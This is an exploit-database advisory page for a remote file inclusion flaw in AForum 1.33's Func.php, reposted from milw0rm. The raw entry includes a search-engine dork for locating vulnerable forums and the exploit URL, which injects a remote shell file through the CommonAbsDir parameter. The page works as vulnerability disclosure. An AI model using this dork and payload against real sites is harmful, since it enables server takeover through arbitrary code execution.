header-logo
Suggest Exploit
vendor:
AForum
by:
ThE TiGeR
N/A
CVSS
N/A
Remote file inclusion
CWE
Product Name: AForum
Affected Version From: 1.33
Affected Version To: 1.33
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

AForum 1.33 Remote file inclusion (Func.php)

The AForum version 1.33 is vulnerable to remote file inclusion in the Func.php file. An attacker can exploit this vulnerability by injecting a malicious shell.txt file through the CommonAbsDir parameter in the URL. This allows the attacker to execute arbitrary code on the affected server.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#AForum =>1.33 Remote file inclusion (Func.php)

#Download Script : http://www.agner.org/software/msgbrd2/aforum.zip

#Thanks Str0ke

#D0rk:allintitle:List of messageboards

#Exploit :

#http://localhost/[aforum_path]/common/func.php?CommonAbsDir=shell.txt?

#Discovered By : ThE TiGeR

#Greetz : Reda, â„¢~${{BraveHeart}}$~â„¢

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-09]

Navigation

Suggest Exploit

Services By CQR